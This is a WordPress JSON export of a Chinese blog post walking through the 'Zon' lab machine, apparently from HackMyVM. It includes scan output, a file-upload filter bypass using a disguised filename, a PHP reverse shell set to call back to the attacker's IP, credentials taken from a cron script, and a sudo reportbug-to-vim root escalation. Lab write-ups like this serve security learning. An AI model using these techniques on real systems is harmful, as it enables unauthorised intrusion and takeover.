{"id":483,"date":"2024-04-01T14:45:42","date_gmt":"2024-04-01T06:45:42","guid":{"rendered":"http:\/\/162.14.82.114\/?p=483"},"modified":"2024-04-01T14:45:42","modified_gmt":"2024-04-01T06:45:42","slug":"hmv-_-zon","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/483\/04\/01\/2024\/","title":{"rendered":"hmv[-_-]Zon"},"content":{"rendered":"

Zon<\/h1>\n
\n

\u672c\u9898\u6700\u597d\u6865\u63a5\uff0c\u6821\u56ed\u7f51\u7684\u5316\u7528\u624b\u673a\u70ed\u70b9\u6865\u63a5<\/p>\n<\/blockquote>\n

\"image-20240401133315374\"<\/div>
\n
\"image-20240401133419388\"<\/div><\/p>\n

\u4e00\u770b\u626b\u7684\u5c31\u4e0d\u5bf9\uff0c\u5c1d\u8bd5\u5207\u6362\u4e3aNAT\u7f51\u5361\uff0c\u91cd\u65b0\u626b\u4e00\u4e0b\uff0c\u4e5f\u53ef\u4ee5\u6362\u70ed\u70b9\u7ee7\u7eed\u6865\u63a5\u626b\uff0c\u4f46\u662f\u6211\u662f\u61d2p\u3002<\/p>\n

\"image-20240401133628658\"<\/div><\/p>\n

\u5bf9\u80c3\u4e86\uff01<\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
rustscan -a 10.0.2.16 -- -A<\/code><\/pre>\n
\n
\u4e4b\u524d\u90fd\u5199\u9519\u4e86\uff0c-A<\/code>\u540e\u9762\u8fd8\u52a0\u4e86\u53c2\u6570\uff0c\u5176\u5b9e\u8fd9\u91cc\u7684-A<\/code>\uff0c\u5bf9\u5e94\u7684\u662fnmap<\/code>\u7684-A<\/code>\uff0c\u6211\u4e00\u76f4\u4ee5\u4e3a\u8fd9\u4e2a\u662frustscan<\/code>\u79fb\u4ea4\u63a7\u5236\u6743\u7684\u53c2\u6570\u5462\u3002<\/p>\n<\/blockquote>\n
Open 10.0.2.16:22\nOpen 10.0.2.16:80<\/code><\/pre>\n
PORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)\n| ssh-hostkey: \n|   256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOHL4gbzUOgWlMW\/HgWpBe3FlvvdyW1IsS+o1NK\/YbUOoM3iokvdbkFxXdYjyvzkNpvpCXfldEQwS+BIfEmdtwU=\n|   256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC0o8\/EYPi0jQMqY1zqXqlKfugpCtjg0i5m3bzbyfqxt\n80\/tcp open  http    syn-ack Apache httpd 2.4.57 ((Debian))\n|_http-server-header: Apache\/2.4.57 (Debian)\n|_http-title: zon\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
feroxbuster -u http:\/\/10.0.2.16<\/code><\/pre>\n
301      GET        9l       28w      307c http:\/\/10.0.2.16\/images => http:\/\/10.0.2.16\/images\/\n301      GET        9l       28w      304c http:\/\/10.0.2.16\/css => http:\/\/10.0.2.16\/css\/\n301      GET        9l       28w      308c http:\/\/10.0.2.16\/uploads => http:\/\/10.0.2.16\/uploads\/\n301      GET        9l       28w      306c http:\/\/10.0.2.16\/fonts => http:\/\/10.0.2.16\/fonts\/\n200      GET      405l     2619w   206407c http:\/\/10.0.2.16\/images\/ser_img3.png\n200      GET     1452l     5977w   212322c http:\/\/10.0.2.16\/fonts\/fontawesome-webfont.ttf\n200      GET      823l     4393w   196808c http:\/\/10.0.2.16\/fonts\/Poppins-BoldItalic.ttf\n301      GET        9l       28w      305c http:\/\/10.0.2.16\/icon => http:\/\/10.0.2.16\/icon\/\n301      GET        9l       28w      303c http:\/\/10.0.2.16\/js => http:\/\/10.0.2.16\/js\/\n200      GET      153l      449w     4306c http:\/\/10.0.2.16\/js\/custom.js\n200      GET        7l      896w    70808c http:\/\/10.0.2.16\/js\/bootstrap.bundle.min.js\n200      GET     2492l    14276w  1161727c http:\/\/10.0.2.16\/images\/coff_img.png\n200      GET     6433l    20653w   210612c http:\/\/10.0.2.16\/js\/bootstrap.bundle.js\n200      GET      936l     5441w   417516c http:\/\/10.0.2.16\/images\/blog1.jpg\n200      GET      846l     5909w   499091c http:\/\/10.0.2.16\/images\/blog2.jpg\n200      GET        3l       44w     1167c http:\/\/10.0.2.16\/images\/menu_icon.png\n200      GET      158l      967w    79372c http:\/\/10.0.2.16\/images\/footer_af.png\n200      GET      342l     1878w   139839c http:\/\/10.0.2.16\/images\/footer_be.png\n200      GET     1197l     2079w    21393c http:\/\/10.0.2.16\/css\/style.css\n200      GET      269l     1633w   128756c http:\/\/10.0.2.16\/images\/ser_img2.png\n200      GET      614l     1238w    11416c http:\/\/10.0.2.16\/css\/default-skin.css\n200      GET      443l     2610w   197291c http:\/\/10.0.2.16\/images\/ser_img1.png\n200      GET      242l     1313w    65160c http:\/\/10.0.2.16\/images\/loading.gif\n200      GET       62l      404w    31130c http:\/\/10.0.2.16\/images\/test_pro.jpg\n200      GET     3615l    22189w  1818685c http:\/\/10.0.2.16\/images\/about.png\n200      GET      294l     1613w   122935c http:\/\/10.0.2.16\/images\/coff.png\n200      GET        5l     1287w    87088c http:\/\/10.0.2.16\/js\/jquery.min.js\n200      GET        5l      478w    45479c http:\/\/10.0.2.16\/js\/jquery.mCustomScrollbar.concat.min.js\n200      GET      304l      604w     6678c http:\/\/10.0.2.16\/css\/responsive.css\n200      GET        7l      277w    44342c http:\/\/10.0.2.16\/js\/owl.carousel.min.js\n200      GET        6l       77w     3351c http:\/\/10.0.2.16\/css\/owl.carousel.min.css\n200      GET        7l     1604w   140421c http:\/\/10.0.2.16\/css\/bootstrap.min.css\n200      GET      213l     1380w    11324c http:\/\/10.0.2.16\/js\/jquery-3.0.0.min.js\n200      GET        1l      870w    42839c http:\/\/10.0.2.16\/css\/jquery.mCustomScrollbar.min.css\n200      GET      373l     1987w   186433c http:\/\/10.0.2.16\/fonts\/Poppins-Thin.ttf\n200      GET      259l     1703w   182124c http:\/\/10.0.2.16\/fonts\/Poppins-Regular.ttf\n200      GET      392l     2209w   177523c http:\/\/10.0.2.16\/fonts\/fontawesome-webfont.woff\n200      GET      288l     1759w   139600c http:\/\/10.0.2.16\/fonts\/fontawesome-webfont.woff2\n200      GET      620l     5062w   200792c http:\/\/10.0.2.16\/fonts\/Poppins-Italic.ttf\n200      GET      260l     1915w   178138c http:\/\/10.0.2.16\/fonts\/Poppins-SemiBold.ttf\n200      GET      511l     1445w    29170c http:\/\/10.0.2.16\/\n200      GET      623l     4094w   197884c http:\/\/10.0.2.16\/fonts\/Poppins-MediumItalic.ttf\n200      GET      667l     4170w   204813c http:\/\/10.0.2.16\/fonts\/Poppins-ExtraLightItalic.ttf\n200      GET      353l     2394w   176854c http:\/\/10.0.2.16\/fonts\/Poppins-Black.ttf\n200      GET      845l     4921w   158169c http:\/\/10.0.2.16\/fonts\/IcoMoon-Free.ttf\n200      GET     1452l     5979w   212524c http:\/\/10.0.2.16\/fonts\/fontawesome-webfont.eot\n200      GET      257l     2142w   178822c http:\/\/10.0.2.16\/fonts\/Poppins-ExtraBold.ttf\n200      GET        7l      570w    50676c http:\/\/10.0.2.16\/js\/bootstrap.min.js\n200      GET      105l      230w     2716c http:\/\/10.0.2.16\/js\/slider-setting.js\n200      GET      723l     4178w   206437c http:\/\/10.0.2.16\/fonts\/Poppins-ThinItalic.ttf\n200      GET        6l      352w    19190c http:\/\/10.0.2.16\/js\/popper.min.js\n200      GET       30l      170w     3969c http:\/\/10.0.2.16\/js\/revolution\/assets\/loader.gif\n200      GET        3l       40w      957c http:\/\/10.0.2.16\/js\/revolution\/assets\/gridtile_white.png\n200      GET        3l       38w      966c http:\/\/10.0.2.16\/js\/revolution\/assets\/gridtile_3x3_white.png\n200      GET        3l       39w      963c http:\/\/10.0.2.16\/js\/revolution\/assets\/gridtile.png\n200      GET        3l       37w      976c http:\/\/10.0.2.16\/js\/revolution\/assets\/gridtile_3x3.png\n200      GET      773l     4356w   195244c http:\/\/10.0.2.16\/fonts\/Poppins-ExtraBoldItalic.ttf\n200      GET        8l      608w    62649c http:\/\/10.0.2.16\/js\/revolution\/js\/jquery.themepunch.revolution.min.js\n200      GET      136l     1626w   107075c http:\/\/10.0.2.16\/js\/revolution\/js\/jquery.themepunch.tools.min.js\n200      GET     1151l     5151w   202793c http:\/\/10.0.2.16\/fonts\/Poppins-LightItalic.ttf\n200      GET      281l     1994w   180221c http:\/\/10.0.2.16\/fonts\/Poppins-Bold.ttf\n200      GET      307l     1670w   178862c http:\/\/10.0.2.16\/fonts\/Poppins-Medium.ttf\n200      GET      563l     4120w   191994c http:\/\/10.0.2.16\/fonts\/Poppins-BlackItalic.ttf\n200      GET      177l      358w     3653c http:\/\/10.0.2.16\/css\/nice-select.css\n200      GET      358l     1712w   185187c http:\/\/10.0.2.16\/fonts\/Poppins-ExtraLight.ttf\n200      GET      108l      179w     1884c http:\/\/10.0.2.16\/css\/slick.css\n200      GET        1l      158w    14143c http:\/\/10.0.2.16\/css\/jquery.fancybox.min.css\n200      GET        2l      433w    53678c http:\/\/10.0.2.16\/css\/animate.min.css\n200      GET     2671l    62869w   444379c http:\/\/10.0.2.16\/fonts\/fontawesome-webfont.svg\n200      GET     8950l    17395w   172839c http:\/\/10.0.2.16\/css\/bootstrap.css\n200      GET        4l       66w    31000c http:\/\/10.0.2.16\/css\/font-awesome.min.css\n200      GET     2574l     4782w   258854c http:\/\/10.0.2.16\/fonts\/FontAwesome.otf\n200      GET      806l     4004w   195419c http:\/\/10.0.2.16\/fonts\/Poppins-SemiBoldItalic.ttf\n200      GET      262l     1711w   183624c http:\/\/10.0.2.16\/fonts\/Poppins-Light.ttf\n200      GET        3l        9w      224c http:\/\/10.0.2.16\/js\/revolution\/assets\/coloredbg.png\n200      GET        1l        4w      586c http:\/\/10.0.2.16\/js\/revolution\/css\/closedhand.html\n200      GET     5798l    11097w   140645c http:\/\/10.0.2.16\/js\/revolution\/css\/layers.css\n200      GET     2637l     4520w    59474c http:\/\/10.0.2.16\/js\/revolution\/css\/navigation.css\n200      GET        1l        5w      582c http:\/\/10.0.2.16\/js\/revolution\/css\/openhand.html\n200      GET        7l      443w    29490c http:\/\/10.0.2.16\/js\/revolution\/css\/settings.css<\/code><\/pre>\n
\u6f0f\u6d1e\u6316\u6398<\/h2>\n
\u8bbf\u95ee\u654f\u611f\u76ee\u5f55<\/h3>\n
\"image-20240401134414023\"<\/div><\/p>\n
\u52a0\u8f7d\u8d44\u6e90\u6162\u5230\u79bb\u8c31\uff0c\u53ef\u80fd\u9700\u8981\u8bf7\u6c42\u5176\u4ed6\u7684\u7f51\u7ad9\u8d44\u6e90\uff0c\u5207\u6362\u70ed\u70b9\uff0c\u6865\u63a5\u3002\u3002\u3002<\/p>\n
# kali\n172.20.10.8\n# Zon\n172.20.10.12<\/code><\/pre>\n
\"image-20240401135135873\"<\/div><\/p>\n
\u8bbf\u95ee\u4e00\u4e0b\uff1a<\/p>\n
\"image-20240401135224091\"<\/div><\/p>\n
\u67e5\u770b\u654f\u611f\u76ee\u5f55\uff0c\u4f46\u662f\u6ca1\u5565\u53d1\u73b0\u3002<\/p>\n
\u4e8c\u6b21\u4fe1\u606f\u641c\u96c6<\/h3>\n
gobuster dir -u http:\/\/172.20.10.12\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html.png,jpg,zip<\/code><\/pre>\n
\/.html.png            (Status: 403) [Size: 277]\n\/index.php            (Status: 200) [Size: 29170]\n\/images               (Status: 301) [Size: 313] [--> http:\/\/172.20.10.12\/images\/]\n\/.php                 (Status: 403) [Size: 277]\n\/about.php            (Status: 200) [Size: 10538]\n\/contact.php          (Status: 200) [Size: 11753]\n\/blog.php             (Status: 200) [Size: 12490]\n\/uploads              (Status: 301) [Size: 314] [--> http:\/\/172.20.10.12\/uploads\/]\n\/upload.php           (Status: 500) [Size: 0]\n\/service.php          (Status: 200) [Size: 12239]\n\/report.php           (Status: 200) [Size: 13]\n\/icon                 (Status: 301) [Size: 311] [--> http:\/\/172.20.10.12\/icon\/]\n\/css                  (Status: 301) [Size: 310] [--> http:\/\/172.20.10.12\/css\/]\n\/js                   (Status: 301) [Size: 309] [--> http:\/\/172.20.10.12\/js\/]\n\/fonts                (Status: 301) [Size: 312] [--> http:\/\/172.20.10.12\/fonts\/]\n\/choose.php           (Status: 200) [Size: 1908]\n\/testimonial.php      (Status: 200) [Size: 17014]\n\/.php                 (Status: 403) [Size: 277]\n\/.html.png            (Status: 403) [Size: 277]\n\/server-status        (Status: 403) [Size: 277]<\/code><\/pre>\n
\u7ee7\u7eed\u67e5\u770b\u4e00\u4e0b\u654f\u611f\u76ee\u5f55\uff1a<\/p>\n
\/choose.php<\/code><\/pre>\n
\"image-20240401140127627\"<\/div><\/p>\n
\u6587\u4ef6\u4e0a\u4f20<\/h3>\n
\u6709\u4e2a\u4e0a\u4f20\u5305\u542bjpeg\u7684zip<\/code>\u7684\u5730\u65b9\uff0c\u6784\u9020\u4e00\u4e0b\uff1a<\/p>\n
head revershell.php  \n\n  <?php\n  \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n  \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n  set_time_limit (0);\n  $VERSION = "1.0";\n  $ip = '172.20.10.8';  \/\/ You have changed this\n  $port = 1234;  \/\/ And this\n  $chunk_size = 1400;<\/code><\/pre>\n
\u5c06\u5176\u91cd\u547d\u540d\u5e76\u538b\u7f29\u63d0\u4ea4\uff1a<\/p>\n
revershell.jpeg.php\nrevershell.php%00.jpeg\nrevershell.jpeg .php<\/code><\/pre>\n
\u6700\u540e\u4e00\u4e2a\u6210\u529f\u4e86\uff1a<\/p>\n
\"image-20240401142516477\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
(remote) www-data@zon:\/$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@zon:\/$ pwd\n\/\n(remote) www-data@zon:\/$ ls\nbin   dev  home        initrd.img.old  lib32  libx32      media  opt   root  sbin  sys  usr  vmlinuz\nboot  etc  initrd.img  lib             lib64  lost+found  mnt    proc  run   srv   tmp  var  vmlinuz.old\n(remote) www-data@zon:\/$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/bin\/sudo\n\/usr\/bin\/newgrp\n\/usr\/bin\/chsh\n\/usr\/bin\/su\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/sbin\/pppd\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/polkit-1\/polkit-agent-helper-1\n(remote) www-data@zon:\/$ cd \/var\/www\/html\n(remote) www-data@zon:\/var\/www\/html$ ls\nabout.php  choose.php   css    hashDB.sh  images     js          service.php      upload.php\nblog.php   contact.php  fonts  icon       index.php  report.php  testimonial.php  uploads\n(remote) www-data@zon:\/var\/www\/html$ cat hashDB.sh \n#!\/bin\/bash\n\n# script that checks the database's integrity every minute\n\ndump=\/dev\/shm\/dump.sql\nlog=\/var\/log\/db_integrity_check.log\ntrue > "${log}"\n\n\/usr\/bin\/mysqldump -u admin -pudgrJbFc6Av#U3 admin credentials > "${dump}"\n\/usr\/bin\/sed -i '$d' "${dump}"\n\nhash="29d8e6b76aab0254f7fe439a6a5d2fba64270dde087e6dfab57fa57f6749858a"\ncheck_hash=$(sha256sum "${dump}" | awk '{print $1}')\n\nif [[ "${hash}" != "${check_hash}" ]] ; then\n  \/usr\/bin\/wall "Alert ! Database hacked !"\n  \/usr\/bin\/du -sh \/var\/lib\/mysql >> "${log}"\n  \/usr\/bin\/vmstat 1 3 >> "${log}"\nelse\n  \/usr\/bin\/sync && \/usr\/bin\/echo 3 > \/proc\/sys\/vm\/drop_caches\n  \/usr\/bin\/echo "$(date) : Integrity check completed for ${dump}" >> "${log}"\nfi<\/code><\/pre>\n
\u5f97\u5230\u6570\u636e\u5e93\u8d26\u53f7\u5bc6\u7801\uff1a<\/p>\n
admin\nudgrJbFc6Av#U3<\/code><\/pre>\n
\u8fde\u63a5\u6570\u636e\u5e93<\/h3>\n
mysql -u admin -p<\/code><\/pre>\n
MariaDB [(none)]> show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| admin              |\n| information_schema |\n| mysql              |\n| performance_schema |\n| sys                |\n+--------------------+\n5 rows in set (0.041 sec)\n\nMariaDB [(none)]> use admin;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nMariaDB [admin]> show tables;\n+-----------------+\n| Tables_in_admin |\n+-----------------+\n| credentials     |\n+-----------------+\n1 row in set (0.000 sec)\n\nMariaDB [admin]> select * from credentials;\n+----------+-------------------------+\n| username | password                |\n+----------+-------------------------+\n| Freddie  | LDVK@dYiEa2I1lnjrEeoMif |\n+----------+-------------------------+\n1 row in set (0.000 sec)<\/code><\/pre>\n
ssh\u767b\u5f55Freddie<\/h3>\n
\u7591\u4f3c\u5f97\u5230\u4e86\u4e00\u4e2a\u7528\u6237\uff0c\u67e5\u770b\u4e00\u4e0b\u662f\u5426\u6709\u8fd9\u4e2a\u7528\u6237\uff1a<\/p>\n
cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/usr\/bin\/zsh\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:109:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\ndnsmasq:x:103:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\npolkitd:x:996:996:polkit:\/nonexistent:\/usr\/sbin\/nologin\nmysql:x:104:112:MySQL Server,,,:\/nonexistent:\/bin\/false\nDebian-snmp:x:105:113::\/var\/lib\/snmp:\/bin\/false\nfreddie:x:1000:1000:,,,:\/home\/freddie:\/bin\/zsh<\/code><\/pre>\n
\u771f\u7684\u6709\uff0c\u5c1d\u8bd5ssh\u8fde\u63a5\uff1a<\/p>\n
Freddie\nLDVK@dYiEa2I1lnjrEeoMif<\/code><\/pre>\n
ssh freddie@172.20.10.12<\/code><\/pre>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u256d\u2500freddie@zon ~ \n\u2570\u2500$ whoami;id\nfreddie\nuid=1000(freddie) gid=1000(freddie) groups=1000(freddie),100(users)\n\u256d\u2500freddie@zon ~ \n\u2570\u2500$ ls -la\ntotal 44\ndrwx------  4 freddie freddie 4096 Apr  1 08:35 .\ndrwxr-xr-x  3 root    root    4096 Nov 27 20:22 ..\nlrwxrwxrwx  1 root    root       9 Dec  3 10:46 .bash_history -> \/dev\/null\n-rw-r--r--  1 freddie freddie  220 Nov 27 20:22 .bash_logout\n-rw-r--r--  1 freddie freddie 3526 Nov 27 20:22 .bashrc\ndrwxr-xr-x  3 freddie freddie 4096 Dec  1 21:06 .local\ndrwxr-xr-x 12 freddie freddie 4096 Apr  1 08:34 .oh-my-zsh\n-rw-r--r--  1 freddie freddie  807 Nov 27 20:22 .profile\n-rwx------  1 freddie freddie   33 Nov 30 07:21 user.txt\n-rw-r--r--  1 freddie freddie  169 Apr  1 08:34 .wget-hsts\n-rw-------  1 freddie freddie   22 Apr  1 08:35 .zsh_history\n-rw-r--r--  1 freddie freddie 3890 Nov 27 20:22 .zshrc\n\u256d\u2500freddie@zon ~ \n\u2570\u2500$ cat user.txt\na0b4603c7fde7e4113d2ee5fbee5a038\n\u256d\u2500freddie@zon ~ \n\u2570\u2500$ sudo -l\nsudo: unable to resolve host zon: Name or service not known\nMatching Defaults entries for freddie on zon:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser freddie may run the following commands on zon:\n    (ALL : ALL) NOPASSWD: \/usr\/bin\/reportbug<\/code><\/pre>\n
\u6253\u5f00\u770b\u4e00\u4f1a\u53d1\u73b0\u662f\u975e\u5e38\u957f\u975e\u5e38\u957f\u7684python\u811a\u672c\uff0c\u76f4\u63a5\u8fd0\u884c\u4e00\u4e0b\u8bd5\u8bd5\uff1a<\/p>\n
sudo \/usr\/bin\/reportbug<\/code><\/pre>\n
\u778e\u70b9\u51e0\u6b21\u4f1a\u6765\u5230\u8fd9\uff1a<\/p>\n
\"image-20240401144409120\"<\/div><\/p>\n
\u5728vim\u4e2d\u8f93\u5165!\/bin\/bash<\/code>\u5373\u53ef\u5b8c\u6210\u63d0\u6743<\/p>\n
Select an editor.  To change later, run 'select-editor'.\n  1. \/bin\/nano        <---- easiest\n  2. \/usr\/bin\/vim.tiny\n\nChoose 1-2 [1]: 2\n\nroot@zon:\/tmp# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@zon:\/tmp# cd \/root\nroot@zon:~# ls\nroot.txt\nroot@zon:~# cat root.txt\n18a72aa09ce61fb487fd6745c8eba769<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
Zon \u672c\u9898\u6700\u597d\u6865\u63a5\uff0c\u6821\u56ed\u7f51\u7684\u5316\u7528\u624b\u673a\u70ed\u70b9\u6865\u63a5 \u4e00\u770b\u626b\u7684\u5c31\u4e0d\u5bf9\uff0c\u5c1d\u8bd5\u5207\u6362\u4e3aNAT\u7f51\u5361\uff0c\u91cd\u65b0\u626b\u4e00\u4e0b\uff0c\u4e5f\u53ef\u4ee5\u6362\u70ed\u70b9 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-483","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/483","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=483"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/483\/revisions"}],"predecessor-version":[{"id":484,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/483\/revisions\/484"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=483"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=483"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=483"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}